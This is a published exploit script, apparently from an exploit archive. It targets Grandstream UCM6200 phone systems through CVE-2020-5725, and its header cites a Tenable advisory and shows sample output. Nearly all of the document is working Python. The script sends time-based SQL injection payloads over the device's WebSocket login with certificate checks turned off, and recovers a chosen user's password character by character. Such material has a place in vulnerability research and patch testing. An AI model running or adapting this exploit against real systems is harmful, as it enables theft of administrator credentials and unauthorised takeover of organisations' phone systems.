Grandstream UCM6200 Series WebSocket 1.0.20.20 SQL Injection

`# Exploit Title: Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection  
# Date: 2020-03-30  
# Exploit Author: Jacob Baines  
# Vendor Homepage: http://www.grandstream.com/  
# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware  
# Version: 1.0.20.20 and below  
# Tested on: Grandstream UCM6202 1.0.20.20  
# CVE : CVE-2020-5725  
# Grandstream UCM6200 Series WebSocket 1.0.20.20 SQL Injection Password Disclosure via Login (time based)  
# Advisory: https://www.tenable.com/security/research/tra-2020-17  
# Sample output:  
#  
# albinolobster@ubuntu:~$ python3 websockify_login_injection.py --rhost 192.168.2.1 --user lolwat  
# [+] Password length is 9  
# [+] Discovering password...  
# LabPass1%  
# [+] Done! The password is LabPass1%  
  
import sys  
import ssl  
import time  
import asyncio  
import argparse  
import websockets  
  
async def password_guess(ip, port, username):  
  
# the path to exploit  
uri = 'wss://' + ip + ':' + str(8089) + '/websockify'  
  
# no ssl verification  
ssl_context = ssl.SSLContext()  
ssl_context.verify_mode = ssl.CERT_NONE  
ssl_context.check_hostname = False  
  
# determine the length of the password. The timeout is 10 seconds...  
probably  
# way too long but whatever.  
length = 0  
while length < 100:  
async with websockets.connect(uri, ssl=ssl_context) as websocket:  
start = time.time()  
login =  
'{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"'  
+ username + '\' AND LENGTH(user_password)==' + str(length) + ' AND  
88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or  
\'1\'=\'2","token":"lolwat"}}'  
await websocket.send(login)  
response = await websocket.recv()  
  
if (time.time() - start) < 5:  
length = length + 1  
continue  
else:  
break  
  
# if we hit max password length than we've done something wrong  
if (length == 100):  
print('[+] Couldn\'t determine the passwords length.')  
sys.exit(1)  
  
print('[+] Password length is', length)  
print('[+] Discovering password...')  
  
# Now that we know the password length, just guess each password byte  
until  
# we've reached the full length. Again timeout set to 10 seconds.  
password = ''  
while len(password) < length:  
value = 0x20  
while value < 0x80:  
if value == 0x22 or value == 0x5c:  
temp_pass = password + '\\'  
temp_pass = temp_pass + chr(value)  
else:  
temp_pass = password + chr(value)  
  
temp_pass_len = len(temp_pass)  
  
start = time.time()  
  
async with websockets.connect(uri, ssl=ssl_context) as  
websocket:  
challenge =  
'{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"'  
+ username + '\' AND user_password LIKE \'' + temp_pass +'%\' AND  
substr(user_password,1,' + str(temp_pass_len) + ') = \'' + temp_pass + '\'  
AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or  
\'1\'=\'2","token":"lolwat"}}'  
await websocket.send(challenge)  
response = await websocket.recv()  
  
if (time.time() - start) < 5:  
value = value + 1  
continue  
else:  
print('\r' + temp_pass, end='')  
password = temp_pass  
break  
  
if value == 0x80:  
print('')  
print('[-] Failed to determine the password.')  
sys.exit(1)  
  
print('')  
print('[+] Done! The password is', password)  
  
top_parser = argparse.ArgumentParser(description='')  
top_parser.add_argument('--rhost', action="store", dest="rhost",  
required=True, help="The remote host to connect to")  
top_parser.add_argument('--rport', action="store", dest="rport", type=int,  
help="The remote port to connect to", default=8089)  
top_parser.add_argument('--user', action="store", dest="user",  
required=True, help="The user to brute force")  
args = top_parser.parse_args()  
  
asyncio.get_event_loop().run_until_complete(password_guess(args.rhost,  
args.rport, args.user))  
`